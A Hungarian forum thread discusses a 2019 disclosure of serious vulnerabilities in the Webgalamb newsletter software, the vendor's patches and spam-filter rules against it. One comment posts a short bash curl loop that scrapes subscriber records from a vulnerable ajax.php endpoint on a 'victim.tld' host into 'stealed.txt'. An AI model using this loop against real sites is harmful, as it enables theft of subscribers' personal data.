Komoly biztonsági hibák a Webgalamb hírlevélküldő és -kezelő megoldásban

 ( trey | 2019. január 5., szombat - 18:37 )

A hazai fejlesztésű Webgalamb hírlevélkezelőt használó weboldalak „kellemes” újévi problémával néznek szembe, mert a Full Disclosure listán január 2-án megjelent riport szerint 7 súlyos sérülékenység található a Webgalamb rendszerben. [...] egyrészt az összes felhasználó (feliratkozó) adata hozzáférhetővé válik (dumpolható az adatbázis), illetve olyan kódok illeszthetők az adatbázisba, amelyek a rendszer adminisztrátorának bejelentkezésekor fognak lefutni, és amelyekkel akár hozzáférhetővé válik az adminisztrátor gépe, vagy akár azon keresztül a teljes hálózat. A kedvencem azonban az a sérülékenység, melyen keresztül lehetősége van a támadónak fájlokat feltölteni a hírlevélküldő szerverre, így kiválóan használható malware terjesztésre (is), azonban alkalmas shell (backdoor), vagy más csalafinta kód- és parancs futtatásra – amellyel viszont már a Webgalamb rendszert hostoló szerver válik kompromittálhatóvá.

Részletek itt. Full disclosure lista levél itt.

Hozzászólás megjelenítési lehetőségek

A választott hozzászólás megjelenítési mód a „Beállítás” gombbal rögzíthető.

en evek ota szurom a webgalambos leveleket, ugyis csak komolytalan cegek hasznaljak

En azt sem tudtam, hogy letezik... :)

a webgalamb az egy spamware. Legalabbis eddig csak spammerektol kaptam ilyen cuccal levelet...

--
O1G

en is, azert szurom evek ota. talan 1x ha reklamalt valaki hogy nem kap meg valami fontosat, amit ezzel kuldtek...

Ha már spamware. Pár hete kezdtem el olyan spameket kapni ami már elérte az ingerküszöbömet, hogy foglalkozzak vele. Belenézve a fejlécbe láttam, hogy az összes ilyen a freemailes címemre jön, az mx.onbox.hu-n keresztül. Gondoltam szűröm az összes mx.onbox.hu-n keresztül érkezőt oszt jónapot, de előtte rákerestem jött-e még más is onnan. Az eredmény az, hogy 2017.11 óta a freemail-es címemre érkező összes email az mx.onbox.hu-n keresztül jön. Vagyis pontosabban a Received mezőbe mx.onbox.hu név kerül. A telekom megvette az onboxot vagy én nézek be valamit?

$ host -tA fmx.freemail.hu
fmx.freemail.hu has address 84.2.43.65
$ host -tA mx.onbox.hu
mx.onbox.hu has address 84.2.43.65

Fejlécben:

Received: (qmail 6855 invoked by uid 31487); 5 Jan 2019 21:52:42 +0100
Received: (qmail 6845 invoked from network); 5 Jan 2019 21:52:42 +0100
Received: from unknown (HELO mx.onbox.hu) (10.6.145.225)
  by 172.27.78.105 with SMTP; 5 Jan 2019 21:52:42 +0100
Received: from sender.tld (sender.tld [x.x.x.x])
	by mx.onbox.hu (Postfix) with ESMTPS id 43XDPP4578z196C
	for <xxxfreemail.hu> Sat,  5 Jan 2019 21:52:41 +0100 (CET)

az onbox a fizetos freemail.hu. A magentasok atjatszottak ezt is az origoval egyutt a new wave media kft-nek...

--
O1G

Amikor Soros elindította a freemailt, meg orbánt az élet rögös útján, biztos nem gondolta volna, hogy 2018-ban ezek összetalálkoznak majd. :)

hat ja...

--
O1G

Sose találkoztam még vele.

-----
„Egy jó kapcsolatban a társunkat az ő dolgában kell támogatni, nem a miénkben.”
rand() a lelke mindennek! :)
Szerinted…

Szerencsés ember...

+1

--
arch,ubuntu,windows,libreelec,omnirom,microg
zbook/elitebook/rpi3/motog4_athene

A legszebb az egészben, hogy ők is a saját szoftverüket használják sales szerzésre... :P

https://www.webgalamb.hu/4/subscriber.php?g=48&f=a42fk913af

Zsír. Szerencsére nem kaptam semmit még innen.
Akkor mehet hozzá? :)

/webgalamb\.hu$/ REJECT 550 "Spammer domain!"

https://hup.hu/node/155731?comments_per_page=9999#comment-2294701
--
"Sose a gép a hülye."

A webgalambot minden "vásárló" saját szerverre telepíti, így csak max. a fejlesztő cég domainjét zárod ki, ha jól értem a fentit.

Így van, ennek így nem sok értelme.
Talán a header-be beteszi magát, az alapján azonosíthatod.

Vicceltem amúgy. :)
De eddig tényleg elkerült ez a galamb.
--
"Sose a gép a hülye."

Lehet hostolást is kérni (plusz pénzért).

van már nekik hostolt megoldásuk is.

Igen - a wgx.hu, ha minden igaz, ami szintén sebezhető volt. :D

X-Mailer: Webgalamb

Szerencsére jó fejek, így nagyon régóta lehetett globál szűrni.

vagy spamassassinbe:

header WEBGALAMB X-Mailer =~ /Webgalamb/i
describe WEBGALAMB Webgalamb email-marketing software signature
score WEBGALAMB 5

wg4 esetén nem látom kapásból ezeket a hibákat, de csak futólag néztem rá egy installra... jó lenne hivatalos reakciót látni az érintett verziókról

egyébként gyönyörűek az obfuszkált php fileok, az egymásba ágyazott eval() miatt még biztonságosan se lehet üzemeltetni ezt a fost

Pedig wg4 esetén is van, csak nem az a path, hanem victim.tld/webgalamb/wg4_moduls/ajax.php?...

igen, de nálam egy kísérlet erejéig próbált csv upload legalábbis nem ment. ettől még persze lehet, hogy ott vannak a hibák, csak kicsit másképp kell kihasználni.

#!/bin/bash
counter=1

while [ $counter -le 1000000 ]
do

curl -d "uidselect=&g=$counter" http://victim.tld/4/wg4_moduls/ajax.php?atment_sddd1xGz=1 >> stealed.txt

done

nem kene novelni a szamlalot? :-)

--
O1G

Hopp, az kimaradt a kopipasztából - egyébként de, kellene. :D

true, ez müx

Ezt írta a support:

"Kedves Gábor!

Aggodalomra semmi ok! :)
A legfrissebb 7-es verzióban ezek javítva lettek.
[...]
"

--
trey @ gépház

Az lehet, de attól még az összes, kint levő telepítés (akár 7-es is) sebezhető maradt. :D

Igen, ez ügyben most írtam nekik. Mármint, hogy a 7.x verzió letöltési linkjén csak röhögő gyerekfejet látok, frissítőcsomagot nem:

https://www.webgalamb.hu/frissites.php?version=7

--
trey @ gépház

Ez mi? Komoly, vagy deface-elték az oldalukat is?
--

Viccnek durva lenne...

És aki nem frissített 7-re, az így járt?

Még várom a választ :)

--
trey @ gépház

Kijött a javítás: https://www.webgalamb.hu/frissites.php?version=7

De ez jó a 6 verzióhoz szerintetek? Én erről nem látok semmit... Mailre meg nem válaszoltak...

Gondolom a legutolsó verziót kalapálták ki először. Én csinálnék egy upgrade-et a hetes verzióra, az a biztos...

Tehát megvennéd az upgradet? Mert én biztos nem adnék nekik több pénzt. :D

Ja, hogy a 6-ról a 7-re fizetős? Aaaaaaz igen... Akkor szépen el kell engedni a galambot, persze jó halkat, mert mint bölcs Salamon óta tudjuk, a hangosnak nincsen szaga... :-D :-D
Viccet félretéve nem venném meg, és a meglévőt is ki3.14csáznám a fenébe, mivel igen jelentős sérülékenségekkel bír, és javítás nincs.

Igen ez a problémám nekem is... Az egyik licenszet ráadásul a 7 megjelenése előtt 1 nappal vettem (még hatos verzió...).

Nagyon gáz hibák, emiatt nem akarok fizetni. Ráadásul a kommunikáció is kritikán aluli.

Akkor már bőven tudtak a sebezhetőségekről, szóval szerintem simán befigyel a hibás teljesítés.

Most beszéltem velük, a mai nap folyamán (valószínűleg) jön a frissítés a 6 verzióhoz.

Jaja :D

Ennek a WebGalamb dolognak van köze a DrótPostaGalamb nevű - már elhalt - dologhoz? :)

--
https://iotguru.live

Szerintem semmi. A WebGalamb egy PHP-ban írt hírlevélküldő rendszer. Elég egyszerű használni, ezért olyan cégek, akik saját ügyfélkörüknek saját termékeikről szeretnének egyszerűen (titkárnő vagy marketinges által) hírleveleket küldeni, előszeretettel használják. Telepítése se túl bonyolult. Az üzemeltetése viszont odafigyelést igényel. Lásd: OP

A felülete elég fancy és nem is túl drága.

Nyilván lehet spammelésre is használni, de véleményem szerint aki ilyesmire (spam küldése) adja a fejét, annak sokkal jobb és költséghatékonyabb lehetőségei is lehetnek a zavarosban halászásra.

--
trey @ gépház

Kijött a javítás a 6 verzióhoz:
https://www.webgalamb.hu/frissites.php?version=6

"mindenképp frissítsd le"

Hogy lehet valamit LE frissíteni?

ahogy letolni, leb@szni

downgrade, upgrade :)

Szövőgyárban kelmét szőnek.

-----
„Egy jó kapcsolatban a társunkat az ő dolgában kell támogatni, nem a miénkben.”
rand() a lelke mindennek! :)
Szerinted…

Fent is lent, meg lent is lent.

De hol gyártják a szövőket?